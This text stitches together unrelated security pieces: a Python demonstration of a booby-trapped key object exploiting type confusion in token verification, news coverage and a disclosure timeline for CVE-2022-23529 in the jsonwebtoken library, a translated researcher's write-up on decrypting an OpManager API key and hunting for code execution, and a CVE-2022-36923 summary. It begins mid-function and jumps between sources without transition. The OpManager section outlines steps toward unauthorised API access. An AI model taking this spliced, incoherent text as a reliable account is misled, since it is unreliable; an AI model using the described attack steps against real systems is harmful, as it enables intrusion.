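    key_bytes = str(key).encode()  # type confusion: assumes the key is PEM/text
    expected = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, presented)

class BoobyTrappedKey:
    def __str__(self):
        print("attacker code runs here")  # stands in for the actual payload
        return "not-a-real-key"

# A poisoned key-store entry triggers the side effect during validation:
naive_verify(b"header.payload", b"\x00" * 32, BoobyTrappedKey())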
Note, however, that you’d pretty much need to hack into the secret key-store database first, before any sort of truly remote code execution trigger would be possible.
And if attackers are already able to wander around your network to the point that they can not only poke their noses into but also modify your JWT secret-key database, you've probably got bigger problems than CVE-2022-23529, as this bug has been designated.
However, if you’ve now patched but you think crooks might realistically have been able to pull off this sort of JWT attack on your network, patching alone isn’t enough.
In other words, if you think you might have been at risk here, don’t just patch and move on.
Use threat detection and response techniques to look for holes by which cybercriminals could get far enough to attack your network more generally…
…and make sure you don’t have crooks in your network anyway, even after applying the patch.
The open-source JsonWebToken (JWT) library is affected by a high-severity security flaw, tracked as CVE-2022-23529 (CVSS score: 7.6), that could lead to remote code execution.
The package is maintained by Auth0; it had over 9 million weekly downloads as of January 2022 and is used by more than 22,000 projects.
The flaw was discovered by Unit 42 researchers; it can be exploited by threat actors by tricking a server into verifying a maliciously crafted JSON web token (JWT) request.
“By exploiting this vulnerability, attackers could achieve remote code execution (RCE) on a server verifying a maliciously crafted JSON web token (JWT) request,” reads the advisory published by Palo Alto Networks. “With that being said, in order to exploit the vulnerability described in this post and control the secretOrPublicKey value, an attacker will need to exploit a flaw within the secret management process.”
JsonWebToken is an open-source JavaScript package that allows users to verify/sign JSON web tokens (JWT).
The flaw impacts JsonWebToken package versions 8.5.1 and earlier; version 9.0.0 addressed the issue.
“For versions <=8.5.1 of jsonwebtoken library, if a malicious actor has the ability to modify the key retrieval parameter (referring to the secretOrPublicKey argument from the readme link) of the jwt.verify() function, they can gain remote code execution (RCE),” reads the advisory published on GitHub. “You are affected only if you allow untrusted entities to modify the key retrieval parameter of the jwt.verify() on a host that you control.”
Vulnerabilities in open-source projects are very dangerous, threat actors could exploit them as part of supply chain attacks that can impact any projects relying on them.
“Open source projects are commonly used as the backbone of many services and platforms today. This is also true for the implementation of sensitive security mechanisms such as JWTs, which play a huge role in authentication and authorization processes.” concludes Palo Alto. “Security awareness is crucial when using open source software. Reviewing commonly used security open source implementations is necessary for maintaining their dependability, and it’s something the open source community can take part in.”
Below is the timeline for this vulnerability:
July 13, 2022 – Unit 42 researchers sent a disclosure to the Auth0 team under responsible disclosure procedures
July 27, 2022 – Auth0 team updated that the issue was under review
Aug. 23, 2022 – Unit 42 researchers sent an update request
Aug. 24, 2022 – Auth0 team updated that the engineering team was working on the resolution
Dec. 21, 2022 – A patch was provided by the Auth0 engineering team
Write a class directly to call the decrypt function
The cryptTag is obtained via EnDecryptUtil.getCryptTag(), which parses the persistence-configurations.xml file to read the CryptTag attribute. Viewing the file content:
Attempting to decrypt with MLITE_ENCRYPT_DECRYPT was unsuccessful; I then found that an external entity was introduced at the top of the XML file.
The CryptTag was finally found in the conf\customer-config.xml file.
The algorithm is AES-256. After decrypting, I connected to the database and checked the AaaLogin table. The domainName obtained is '-', and the final request packet is as follows:
From this, we get access to the REST API.
For the RCE approach, I looked at the REST API documentation. There is a workflow feature that can be used for RCE, but there is a problem with reaching it through the REST API: it is an internal API. The isAPIClient flag in the session is only assigned when you log in, so here isAPIClient is false, and NmsUtil.isRMMEdition is false as well, causing an exception to be thrown by APIError.internalAPI(request, response). As a result, none of the internal APIs can be called.
In conf\OpManager\do\RestApi.xml, APIs marked EXPOSED_API=TRUE are exposed externally; the key APIs that define the workflow are among the internal ones.
At this point, the RCE path was broken. I traced back through the isInternalAPI() function and found that all the APIs are listed in the database; a total of 955 APIs can be accessed through the REST API.
I looked through them and saw nothing that could add, delete, or modify anything, only reads. I hope someone luckier can dig an RCE out of these.
Addendum
A colleague looked at the other two OpManager command-injection CVEs and found that it should be possible to chain them together into an RCE; see my colleague's article.
The writing is rough, the wording casual, the content simple, and the techniques unpolished; pointers and corrections from the masters are welcome, and I am grateful.
CVE-2022-36923 Detail
Current Description
Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user’s API key, and then access external APIs.